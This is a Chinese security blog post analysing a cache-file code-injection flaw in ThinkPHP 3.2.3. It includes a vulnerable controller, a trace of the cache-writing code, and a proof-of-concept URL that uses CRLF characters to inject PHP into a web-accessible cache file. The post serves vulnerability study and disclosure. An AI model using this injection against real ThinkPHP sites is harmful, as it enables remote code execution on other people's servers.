thinkphp3缓存漏洞
2022/3/2 14:16:18
本文主要是介绍thinkphp3缓存漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
配置控制器Application/Home/Controller/IndexController.class.php
<?php namespace Home\Controller; use Think\Controller; class IndexController extends Controller { public function index(){ $data=I('get.data'); S('data',$data); } }
我们在浏览器访问http://127.0.0.1/thinkphp-3.2.3/?data=spring
发现生成缓存文件Application/Runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php
缓存文件的名称8d777f385d3dfec8815d20f7496026dc
就是S('data',$data);
中data
的MD5
代码分析
打断点进入S()
方法
跟进写缓存部分的代码return $cache->set($name, $value, $expire);
文件名来自filename()
函数,在有源码的情况下这是已知的
$data
来自序列化之后的$value
,$value
可控
$data = serialize($value);
现在的$data
是"s:6:"spring";"
接下来的这段代码是写入文件的关键
$data = "<?php\n//" . sprintf('%012d', $expire) . $check . $data . "\n?>"; $result = file_put_contents($filename, $data);
这里使用了file_put_contents()
函数,另外写入的部分用了//
注释符防止其被解析,但我们可以使用换行符等进行绕过
所以最终我们的POC为http://127.0.0.1/thinkphp-3.2.3/?data=%0d%0aphpinfo();%0d%0a//
0x0d - \r, carrige return 回车
0x0a - \n, new line 换行
Windows 中换行为0d 0a
UNIX 换行为 0a
因为ThinkPHP3的入口文件位于根目录下,和 application 等目录在同一目录下,导致系统很多文件都可以访问,跟日志泄露一样,这里生成的缓存文件也是可以直接访问的
访问http://127.0.0.1/thinkphp-3.2.3/Application/runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php
可见
缓存文件内容为
<?php //000000000000s:16:" phpinfo(); //"; ?>
参考链接
- https://www.freebuf.com/vuls/282906.html
- https://zhuanlan.zhihu.com/p/28554803
END
建了一个微信的安全交流群,欢迎添加我微信备注进群
,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注
这篇关于thinkphp3缓存漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-03-29env: php: no such file or directory
- 2024-03-01php foreach break
- 2024-02-26Exception参数 php-icode9专业技术文章分享
- 2023-12-30PHP文件批量上传-icode9专业技术文章分享
- 2023-12-30thinkphp6 withJoin-icode9专业技术文章分享
- 2023-12-27MagicArray:像php一样,让Go业务代码不再卷!
- 2023-11-18centos7编译安装PHP教程。
- 2023-11-18centos7编译安装phpMyAdmin教程。
- 2023-10-13唱衰这么多年,PHP 仍然还是你大爷!
- 2023-07-25PHP8,性能更好,语法更好,类型安全更完善